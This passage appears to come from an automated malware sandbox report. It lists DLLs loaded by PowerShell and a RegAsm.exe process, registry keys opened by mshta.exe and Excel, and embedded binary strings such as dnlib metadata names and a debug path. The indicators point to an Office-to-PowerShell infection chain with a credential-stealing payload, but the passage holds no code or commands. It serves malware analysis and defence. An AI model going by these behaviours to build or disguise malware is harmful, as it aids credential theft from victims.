                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdb source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
